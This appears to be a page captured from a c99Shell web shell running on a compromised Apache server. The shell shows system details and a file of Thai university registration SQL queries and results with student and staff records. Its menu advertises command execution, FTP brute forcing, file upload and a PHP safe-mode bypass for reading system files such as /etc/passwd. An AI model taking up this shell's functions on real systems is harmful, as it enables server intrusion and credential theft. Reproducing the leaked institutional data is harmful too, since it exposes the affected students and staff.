!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/xmigratex/   drwxr-xr-x
Free 52.27 GB of 127.8 GB (40.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     chk_before.sql.php (4.52 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
4 -- result qry 1 : 0 row -- 2 - ค้นหาแต่ละนักศึกษา แต่ละปี มีการประมวลผลผ่านมากกว่า 1 ครั้ง -- qry 2 test 22/10/2554 select * from ( SELECT studentId,acadYear ,SUM(case when ss2.passStatus IN ( 1, 2, 3 ) then 1 else 0 end ) as pass FROM bnct_reg.`StudentStatus` ss2 GROUP BY studentId,acadYear )ss where ss.pass > 1 -- result qry 2 : 1 row studentId acadYear pass 143 2548 2 -- extra ค้นหา แต่ละนักศึกษา แต่ละปี ไม่มีการประมวลผลผ่าน -- qry 2.1 test -- pass studentStatus = 4 select * from ( SELECT studentId,acadYear ,SUM(case when ss2.passStatus IN ( 1, 2, 3 ) then 1 else 0 end ) as pass ,SUM(case when ss2.passStatus > 3 then 1 else 0 end ) as more FROM bnct_reg.`StudentStatus` ss2 WHERE (studentId,acadYear) NOT IN (SELECT studentId,acadYear FROM bnct_reg.`StudentStatus` where studentStatus > 2 OR GPA=0 group by studentId,acadYear ) GROUP BY studentId,acadYear )ss where ss.pass = 0 AND ss.more != 0 -- result qry 2.1 : ? row studentId acadYear pass passStatus>3 357 2551 0 1 402 2551 0 1 415 2551 0 1 -- ----------------------------------- -- 3 - ค้นหา อาจารย์ ประจำและอาจารย์พิเศษ -- จากข้อมูล สันนิษฐาน ว่ารหัสอาจารย์ประจำ=291... และอาจารย์พิเศษ=294...(แต่ไม่สนใจ) -- qry 3 test 22/10/2554 select officerId,officerCode,officerName,officerSurname,ofSitId from bnct_reg.Officer where ofSitId = 1 -- result qry 3 : 216 row ( ofSitId = 1 : 66 row , ofSitId = 2 : 150 row ) -- 3.1 - ค้นหาข้อมูลบุคลากร ที่ชื่อสกุลซ้ำกัน -- qry 3.1 test 28/10/2554 select * from ( SELECT `officerId`,officerName,`officerSurname` FROM `Officer` WHERE 1 )of1 inner join ( SELECT `officerId`,officerName,`officerSurname` FROM `Officer` WHERE 1 )of2 on of1.officerId != of2.officerId AND of1.officerName = of2.officerName AND of1.officerSurname= of2.officerSurname -- result qry 3.1 : 2 row officerId officerCode officerName officerSurname officerId officerCode officerName officerSurname 175 2945172 นรีเวช รพ.วชิระภูเก็ต 112 2945101 นรีเวช รพ.วชิระภูเก็ต 112 2945101 นรีเวช รพ.วชิระภูเก็ต 175 2945172 นรีเวช รพ.วชิระภูเก็ต -- ----------------------------------- -- 4 - ค้นหา อาคาร ห้อง -- qry 4 test 22/10/2554 SELECT * FROM bnct_reg.Room rm INNER JOIN bnct_reg.Building bd ON bd.buildingId = rm.buildingId ORDER BY bd.buildingId, rm.buildingId -- result qry 4 : Room 111 row , Building 34 row -- ----------------------------------- -- 5 - ค้นหา หอพัก -- qry 5 test 22/10/2554 SELECT * FROM `Dom` -- result qry 5 : 66 row -- ----------------------------------- -- ? - ค้นหา -- qry ? test day -- result qry ? : ? row -- ----------------------------------- ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]--